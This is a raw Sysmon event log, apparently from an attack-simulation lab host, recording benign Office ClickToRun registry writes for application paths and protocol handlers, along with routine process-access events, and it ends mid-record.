14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-publisher\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 13241300x800000000000000075996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-powerpoint\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 13241300x800000000000000075995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-excel\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 13241300x800000000000000075994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-access\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 13241300x800000000000000075993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Lync.exe\PathC:\Program Files\Microsoft Office\Root\Office16\ 13241300x800000000000000075992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Lync.exe\(Default)C:\Program Files\Microsoft Office\Root\Office16\Lync.exe 13241300x800000000000000075991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MsoHtmEd.exe\UseURL1 13241300x800000000000000075990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OneNote.exe\SaveURL1 13241300x800000000000000075989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OneNote.exe\UseURL1 13241300x800000000000000075988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OneNote.exe\PathC:\Program Files\Microsoft Office\Root\Office16\ 13241300x800000000000000075987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OneNote.exe\(Default)C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE 13241300x800000000000000075986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe\SaveURL1 13241300x800000000000000075985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe\UseURL1 13241300x800000000000000075984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe\PathC:\Program Files\Microsoft Office\Root\Office16\ 13241300x800000000000000075983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe\(Default)C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE 13241300x800000000000000075982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SKYPESERVER.EXE\PathC:\Program Files\Microsoft Office\Root\Office16\SkypeSrv\ 13241300x800000000000000075981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SKYPESERVER.EXE\(Default)C:\Program Files\Microsoft Office\Root\Office16\SkypeSrv\SKYPESERVER.EXE 13241300x800000000000000075980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE\PathC:\Program Files\Microsoft Office\Root\Office16\ 13241300x800000000000000075979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE\(Default)C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE 13241300x800000000000000075978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MSPUB.EXE\SaveURL1 13241300x800000000000000075977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MSPUB.EXE\UseURL1 13241300x800000000000000075976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MSPUB.EXE\PathC:\Program Files\Microsoft Office\Root\Office16\ 13241300x800000000000000075975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MSPUB.EXE\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSPUB.EXE 13241300x800000000000000075974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SKYPESERVER.EXE\PathC:\Program Files\Microsoft Office\Root\Office16\SkypeSrv\ 13241300x800000000000000075973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SKYPESERVER.EXE\(Default)C:\Program Files\Microsoft Office\Root\Office16\SkypeSrv\SKYPESERVER.EXE 13241300x800000000000000075972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\powerpnt.exe\SaveURL1 13241300x800000000000000075971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\powerpnt.exe\UseURL1 13241300x800000000000000075970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\powerpnt.exe\PathC:\Program Files\Microsoft Office\Root\Office16\ 13241300x800000000000000075969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\powerpnt.exe\(Default)C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE 13241300x800000000000000075968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SKYPESERVER.EXE\PathC:\Program Files\Microsoft Office\Root\Office16\SkypeSrv\ 13241300x800000000000000075967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SKYPESERVER.EXE\(Default)C:\Program Files\Microsoft Office\Root\Office16\SkypeSrv\SKYPESERVER.EXE 13241300x800000000000000075966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\excel.exe\SaveURL1 13241300x800000000000000075965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\excel.exe\UseURL1 13241300x800000000000000075964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\excel.exe\PathC:\Program Files\Microsoft Office\Root\Office16\ 13241300x800000000000000075963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\excel.exe\(Default)C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE 13241300x800000000000000075962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MSACCESS.EXE\UseURL1 13241300x800000000000000075961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MSACCESS.EXE\PathC:\Program Files\Microsoft Office\Root\Office16\ 13241300x800000000000000075960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MSACCESS.EXE\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE 13241300x800000000000000075959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\sdxhelper.exe\(Default)C:\Program Files\Microsoft Office\Root\Office16\SDXHelper.exe 13241300x800000000000000075958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe\UseURL1 13241300x800000000000000075957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe\(Default)C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE 13241300x800000000000000075956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MsoHtmEd.exe\UseURL1 13241300x800000000000000075955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoasb.exe\(Default)C:\Program Files\Microsoft Office\Root\Office16\msoasb.exe 13241300x800000000000000075954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:44.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoadfsb.exe\(Default)C:\Program Files\Microsoft Office\Root\Office16\msoadfsb.exe 10341000x800000000000000075953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.123{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBE8-607E-390D-00000000BB01}5652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.108{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE8-607E-390D-00000000BB01}5652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.108{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE8-607E-390D-00000000BB01}5652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\tel\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000075949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\skypecast15\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000075948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\sips\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000075947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\sip\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 10341000x800000000000000075946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.061{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000075945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.061{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000075944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.061{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000075943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.061{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+